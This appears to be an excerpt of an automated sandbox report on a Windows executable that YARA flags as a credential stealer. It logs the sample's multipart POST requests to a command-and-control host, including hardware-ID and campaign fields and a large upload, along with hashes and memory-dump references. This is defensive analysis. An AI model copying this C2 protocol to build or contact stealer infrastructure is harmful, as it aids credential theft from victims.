2024-12-27 07:56:56 UTC  270                OUT        (HTTP request)
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=28X9CBWL
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1159
    Host: mindhandru.buzz
2024-12-27 07:56:56 UTC  1159               OUT        (request body, decoded from the raw bytes; dump truncated as in the report)
    --28X9CBWL
    Content-Disposition: form-data; name="hwid"

    E7A4D190B29C4B72BEBA0C6A975F1733
    --28X9CBWL
    Content-Disposition: form-data; name="pid"

    1
    --28X9CBWL
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --28X9CBWL
    Content-Disposit
2024-12-27 07:56:57 UTC  1126               IN         (HTTP response)
    HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:56:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=af5u8uu7hqm05rj0f3ghi7oae9; expires=Tue, 22 Apr 2025 01:43:36 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MmI7RacnU16oBSjirWR562tIs1BRpfrUIrBlZWcvHuygDRZAcU1xkHkbm8P6M1Yb4EwmiB%2BkGhLlc2k3QsGw1ursr%2BqCO4ae3ujJnYGA%2Frn%2Fx4AcqjZR2JnoGeqM8eaU9U4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87c1c72c1842f5-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1576&rtt_var=613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2065&delivery_rate=1753753&cwnd=195&unsent_bytes=0&cid=a925c53285d36411&ts=782&x=0"
2024-12-27 07:56:57 UTC  20                 IN         (response body, chunked; chunk size then payload)
    f
    ok 8.46.123.189
2024-12-27 07:56:57 UTC  5                  IN         (terminating chunk)
    0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.7  49723        172.67.165.185  443               3592  C:\Users\user\Desktop\cFLK1CiiNK.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-27 07:56:59 UTC  278                OUT        (HTTP request)
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=NQADJPVE510BPD
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 552698
    Host: mindhandru.buzz
2024-12-27 07:56:59 UTC  15331              OUT        (request body, first chunk, decoded from the raw bytes; dump truncated as in the report)
    --NQADJPVE510BPD
    Content-Disposition: form-data; name="hwid"

    E7A4D190B29C4B72BEBA0C6A975F1733
    --NQADJPVE510BPD
    Content-Disposition: form-data; name="pid"

    1
    --NQADJPVE510BPD
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --NQADJPVE
2024-12-27 07:57:01 UTC    1129    IN    HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:57:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=uj8sm4qqdi3hmr1b0880fpdo1i; expires=Tue, 22 Apr 2025 01:43:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eejPNt0m2MJ8JuXgjJAmVRSmMpH6AgSmXnmbks4cYsd3Mt8XYvacwXM8SZ8PreXSqEyByZJiDw0m7PplHOucoEMO%2BC8SiIFPUMm6lPfa3mrx7UcM5%2BKBbCOS1JYyuGAjId0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c1d769f542cf-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2133&min_rtt=2124&rtt_var=815&sent=198&recv=574&lost=0&retrans=0&sent_bytes=2838&recv_bytes=555196&delivery_rate=1327876&cwnd=252&unsent_bytes=0&cid=ba9b540c61f7523a&ts=2370&x=0"

Target ID: 0
Start time: 02:56:38
Start date: 27/12/2024
Path: C:\Users\user\Desktop\cFLK1CiiNK.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\cFLK1CiiNK.exe"
Imagebase: 0xaa0000
File size: 1'865'728 bytes
MD5 hash: A95FC73C07C7D57256DE64B06E73A6CD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1400622014.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1401111547.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Strings
Memory Dump Source
• Source File: 00000000.00000003.1400622014.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, Offset: 016F8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_16f8000_cFLK1CiiNK.jbxd
Memory Dump Source
• Source File: 00000000.00000003.1400997704.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Offset: 01724000, based on PE: false
• Associated: 00000000.00000003.1400942562.0000000001724000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_16f8000_cFLK1CiiNK.jbxd
Memory Dump Source
• Source File: 00000000.00000003.1400997704.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Offset: 01728000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_16f8000_cFLK1CiiNK.jbxd